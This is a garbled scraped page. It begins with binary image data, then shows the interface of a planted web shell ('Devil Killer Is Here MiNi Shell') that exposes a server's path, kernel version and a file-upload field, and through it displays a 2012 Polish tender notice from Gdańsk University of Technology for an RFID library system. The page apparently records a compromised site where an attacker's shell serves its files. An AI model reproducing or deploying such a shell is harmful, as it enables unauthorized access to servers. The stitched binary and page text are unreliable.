JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120704/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120704/234352-N-2012.html

<p class="kh_header"><b>Gdańsk: dostawę i wdrożenie systemu zarządzania, udostępniania i zabezpieczenia zbiorów bibliotecznych do Biblioteki w Centrum Nanotechnologii Politechniki Gdańskiej</b><br>
<b>Numer ogłoszenia: 234352 - 2012; data zamieszczenia: 04.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Politechnika Gdańska Dział Zamówień Publicznych , ul. Narutowicza 11/12, 80-233 Gdańsk, woj. pomorskie, tel. +48 58 347 24 00, faks +48 58 347 29 13.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.pg.gda.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> dostawę i wdrożenie systemu zarządzania, udostępniania i zabezpieczenia zbiorów bibliotecznych do Biblioteki w Centrum Nanotechnologii Politechniki Gdańskiej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest dostawa i wdrożenie systemu zarządzania, udostępniania i zabezpieczenia zbiorów bibliotecznych zrealizowanego w technologii RFID ( Radio-frequency identification ).
Oferowany system musi zostać zintegrowany i współpracować z zintegrowanym systemem bibliotecznym posiadanym przez Bibliotekę Politechniki Gdańskiej - VTLS Virtua. 
Wszystkie elementy systemu, wykorzystujące technologię RFID, muszą pracować z częstotliwością 13,56 MHz, zapewniać bezprzewodową transmisję danych i energii, antykolizyjność i zabezpieczenie przed kopiowaniem danych. Szczegółowe wymagania techniczne i funkcjonalne zawarte są w załączniku nr 6 do SIWZ. Przedmiot zamówienia należy wykonać dwuetapowo. 
I etap - dostarczenie 40 000 samoprzylepnych etykiet RFID oraz mobilnego stanowiska kodowania etykiet.
II etap - dostawa pozostałych urządzeń, wdrożenie systemu oraz przeprowadzenie szkolenia.
1.	Termin realizacji zamówienia: 
I etap :  do 20 dni od podpisania umowy.
II etap: rozpoczęcie realizacji nie wcześniej niż 27 sierpnia 2012, zakończenie nie później niż 21 września 2012. 

2.	Miejsce realizacji dostawy:
I etap:
Politechnika Gdańska,
Gmach Główny pok 52
ul. G. Narutowicza 11/12
80-233 Gdańsk.
II etap:
Politechnika Gdańska,
Biblioteka w budynku - Centrum Nanotechnologii Politechniki Gdańskiej, 
ul. G. Narutowicza 11/12
80-233 Gdańsk.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 30.23.80.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 21.09.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunkiem przystąpienia do przetargu jest wniesienie przed 
upływem terminu składania ofert, wadium w wysokości: 7.000,00 PLN (słownie: siedem tysięcy 
złotych, zero groszy) 1. Wadium może być wniesione w jednej lub kilku następujących 
formach: przelewem na rachunek bankowy Zamawiającego nr 64 1160 2202 0000 0001 8607 
3782, w Banku Millenium, z dopiskiem: Wadium dostawa w ramach Projektu Centrum Nanotechnologii Politechniki Gdańskiej ZP/ 251/050/D/12 
. Wniesienie wadium w pieniądzu za 
pomocą przelewu bankowego Zamawiający będzie uważał za skuteczne tylko wówczas, gdy 
bank prowadzący rachunek Zamawiającego potwierdzi, że otrzymał taki przelew przed 
upływem terminu składania ofert tj. do  dnia 12 -  07  -  2012 r. , do godz. 10:30. W 
wymienionym przypadku dołączenie do oferty kopii polecenia przelewu wystawionego przez 
Wykonawcę nie jest warunkiem koniecznym do stwierdzenia przez Zamawiającego 
terminowego wniesienia wadium przez Wykonawcę. 2) poręczeniach bankowych lub 
poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest 
zawsze poręczeniem pieniężnym, 3) gwarancjach bankowych, 4) gwarancjach 
ubezpieczeniowych, 5) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b, 
ust. 5, pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej  Agencji Rozwoju 
Przedsiębiorczości (tekst jednolity Dz. U. z 2007 r. Nr 42, poz. 275) 2. Dokument wadialny 
(poręczenie lub gwarancja) musi być sporządzony zgodnie z obowiązującym prawem i 
zawierać następujące elementy: 1) nazwę oraz wskazanie siedziby: dającego zlecenie 
(Wykonawcy), beneficjenta gwarancji/poręczenia (Zamawiającego), oraz 
gwaranta/poręczyciela (banku; instytucji ubezpieczeniowej lub podmiotu poręczającego) 2) 
określenie postępowania o udzielenie zamówienia publicznego, którego dotyczy 3) kwotę 4) 
termin ważności 5) mieć formę oświadczenia bezwarunkowego płatnego na pierwsze pisemne 
żądanie Zamawiającego, bez pośrednictwa banku lub innej tego typu instytucji 6) być 
nieodwołalny, 7) obejmować odpowiedzialność za wszystkie przypadki powodujące utratę 
wadium przez Wykonawcę, określone w art. 46 ust. 4a, 5 uPzp, 8) a także obejmować cały 
okres związania ofertą, określony w specyfikacji. 3. Zamawiający dokona zwrotu wadium 
wszystkim Wykonawcom zgodnie z art. 46 ust. 1 do 4 ustawy PZP. 4. Zamawiający zaleca 
dołączenie do oferty dowodu wniesienia wadium tj. odpowiednio: 1) kopii potwierdzenia 
dokonania przelewu</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia w niniejszym postępowaniu nie wymaga posiadania specjalnych uprawnień.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że zrealizował należycie w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie co najmniej dwie dostawy wraz z wdrożeniem systemu zabezpieczenia i identyfikacji zbiorów bibliotecznych, opartego na technologii RFID pracującego w częstotliwości 13,56 MHz i dokonał integracji dostarczonego systemu z systemem bibliotecznym VTLS Virtua w zakresie identyfikacji czytelników oraz dokonywania samodzielnych wypożyczeń i samodzielnych zwrotów z wykorzystaniem protokołu SIP2</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek ogólny za spełniony na podstawie złożonego oświadczenia - stanowiącego zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek ogólny za spełniony na podstawie złożonego oświadczenia - stanowiącego zał. nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Zamawiający uzna warunek ogólny za spełniony na podstawie złożonego oświadczenia - stanowiącego zał. nr 2 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Jeżeli w miejscu zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub w 
miejscu zamieszkania, nie wydaje się dokumentu, o których mowa w III.4.3.1), zastępuje się 
je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem 
sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego 
odpowiednio miejsca zamieszkania osoby lub kraju, w którym Wykonawca ma siedzibę lub 
miejsce zamieszkania, z zachowaniem terminów, o których mowa odpowiednio w III.4.3.1. 2. 
Oferta wspólna Wykonawców A. Wykonawcy zamierzający wspólnie ubiegać się o 
udzielenie zamówienia (np. konsorcjum, spółka cywilna) zobowiązani są do ustanowienia 
pełnomocnika do reprezentowania ich w niniejszym postępowaniu, albo reprezentowania w 
postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo musi 
być udzielone w formie pisemnej, wskazywać w szczególności: - postępowanie o zamówienie 
publiczne, którego dotyczy,  -  Wykonawców ubiegających się wspólnie o udzielenie 
zamówienia,  -  ustanowionego pełnomocnika,  -  zakres jego umocowania. Pełnomocnictwo 
musi być podpisane w imieniu wszystkich Wykonawców ubiegających się wspólnie o 
udzielenie zamówienia przez osoby uprawnione do składania oświadczeń woli wymienione 
we właściwym rejestrze lub ewidencji działalności gospodarczej Wykonawcy. B. 
Wykonawcy wspólnie ubiegający się o udzielenie zamówienia w formularzu oferty jak i w 
innych dokumentach powołujących się na Wykonawcę w miejscu np. nazwa i adres 
Wykonawcy, winni wpisać dane dotyczące wszystkich Wykonawców, a nie ich 
pełnomocnika. C. Aby podmioty występujące wspólnie spełniały warunki:  -  każdy z tych 
podmiotów z osobna musi wykazać brak podstaw do wykluczenia z postępowania o 
udzielenie zamówienia . Dokumenty opisane w III.4.2), które muszą zostać złożone na 
potwierdzenie wykazania braku podstaw do wykluczenia z postępowania o udzielenie 
zamówienia, każdy podmiot składa z osobna. Łącznie (wspólnie) te podmioty muszą spełniać 
warunki, o których mowa w III.3). Dokumenty opisane w III.4,1, które należy złożyć na 
potwierdzenie spełniania warunków o których mowa w III.3, podmioty składają wspólnie lub 
każdy podmiot z osobna. Dokumenty dotyczące poszczególnych podmiotów, powinny być 
podpisane odpowiednio przez osoby uprawnione do reprezentowania tych podmiotów, 
których dotyczą. Dokumenty, wspólne dla wszystkich podmiotów, powinny być podpisane 
przez pełnomocnika lub wszystkich Wykonawców wspólnie ubiegających się o zamówienie. 
3. Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach 
zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, 
niezależnie od charakteru prawnego łączących go z nimi stosunków. Wykonawca w takiej 
sytuacji zobowiązany jest udowodnić Zamawiającemu, iż będzie dysponował zasobami 
niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie 
tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z 
nich przy wykonywaniu zamówienia 4. Wykonawca składa ofertę według załącznika nr 1 do 
SIWZ. 5. Oferta winna być podpisana przez każdego z Wykonawców występujących 
wspólnie lub upoważnionego przedstawiciela  -  pełnomocnika, by prawnie zobowiązywała 
wszystkich Wykonawców. 6. Podmioty występujące wspólnie  ponoszą solidarną 
odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązań.
7. Pełnomocnictwo do reprezentowania Wykonawcy powinno być dołączone do oferty, o ile prawo do jej podpisania nie wynika z dokumentów załączonych do oferty. 
Pełnomocnictwo może być złożone w formie oryginału lub kserokopii potwierdzonej za zgodność z oryginałem przez  notariusza</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wzór umowy, która zostanie zawarta z wybranym Wykonawcą, stanowi zał. Nr 5 do specyfikacji. Zmiana umowy może być dokonana tylko za zgodą obu Stron.
Wszystkie zmiany umowy dokonywane są w formie pisemnej i muszą być podpisane przez upoważnionych przedstawicieli obu Stron. 
Zamawiający dopuszcza możliwość zmian postanowień zawartej umowy w stosunku do treści oferty,  
na podstawie której dokonano wyboru Wykonawcy, dotyczących: a) terminu wykonania przedmiotu umowy w przypadku wystąpienia niżej wymienionych okoliczności pod warunkiem, że mają one wpływ na termin realizacji całego przedmiotu umowy. Okoliczności mogące spowodować zmianę terminu mogą wynikać z działania siły wyższej (np. klęski żywiołowe, huragan, powódź, katastrofy transportowe, pożar, eksplozje, wojna, strajk i inne nadzwyczajne wydarzenia, których zaistnienie leży poza zasięgiem i kontrolą Stron) oraz z powodu zmiany terminu oddania Budynku Centrum Nanotechnologii. W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana  z przyczyną jaka ją spowodowała.
b) zmian osób reprezentujących strony umowy lub osób biorących udział 
w realizacji przedmiotu umowy,
c) zmiany nazw i innych danych identyfikacyjnych stron umowy.
których zaistnienie leży poza zasięgiem 
i kontrolą Stron) oraz z powodu zmiany terminu oddania Budynku Centrum Nanotechnologii. W okolicznościach wyżej wymienionych strony ustalają nowe terminy umowne, z tym że wielkość zmian musi być powiązana  z przyczyną jaka ją spowodowała.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.pg.gda.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Politechnika Gdańska, Biuro Projektu Centrum Nanotechnologii Politechniki Gdańskiej, Al. Zwycięstwa 27, 80-219 Gdańsk.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.07.2012 godzina 10:30, miejsce: Politechnika Gdańska, Biuro Projektu Centrum Nanotechnologii Politechniki Gdańskiej, Al. Zwycięstwa 27, 80-219 Gdańsk (pok. 11).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Dostawa jest realizowana m. in. w ramach Projektu Centrum Nanotechnologii Politechniki Gdańskiej współfinansowany przez Unię Europejską ze środków Europejskiego Funduszu Rozwoju Regionalnego w ramach Programu Operacyjnego Infrastruktura i Środowisko. Wartość dofinansowania - 73 664 000 zł. Numer umowy o dofinansowanie: UDA-POIS.13.01-017/08-00..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com